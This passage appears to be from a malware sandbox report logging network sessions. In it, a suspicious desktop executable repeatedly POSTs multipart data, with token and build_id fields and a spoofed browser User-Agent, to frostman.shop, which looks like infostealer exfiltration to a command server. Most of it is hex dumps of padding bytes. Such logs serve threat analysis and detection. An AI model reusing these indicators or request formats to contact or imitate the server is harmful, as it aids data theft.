                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:49 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              28192.168.2.749880116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3ECTJEK689RQQIMOZM7Y
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 393697
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 45 4b 36 38 39 52 51 51 49 4d 4f 5a 4d 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 45 4b 36 38 39 52 51 51 49 4d 4f 5a 4d 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 45 4b 36 38 39 52 51 51 49 4d 4f 5a 4d 37 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------3ECTJEK689RQQIMOZM7YContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------3ECTJEK689RQQIMOZM7YContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------3ECTJEK689RQQIMOZM7YCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:51 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              29192.168.2.74984518.165.220.1104431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:50 UTC925OUTGET /b?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                              Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              2024-12-20 06:31:50 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                              Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                              Location: /b2?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                              set-cookie: UID=139bc9b74b908404e24257b1734676310; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                              set-cookie: XID=139bc9b74b908404e24257b1734676310; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                              Via: 1.1 a95adf7afe468fe543cb5750140a2bfa.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: pG9eeLPUKgLr1syF78Lzc5Z2ByU2ke6iExjZp0sTzZg6AYHCFQVA0w==


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              30192.168.2.749897116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----CT2VAIM79H4EU3E37GL6
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 131557
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 54 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 54 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 43 54 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------CT2VAIM79H4EU3E37GL6Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------CT2VAIM79H4EU3E37GL6Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------CT2VAIM79H4EU3E37GL6Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
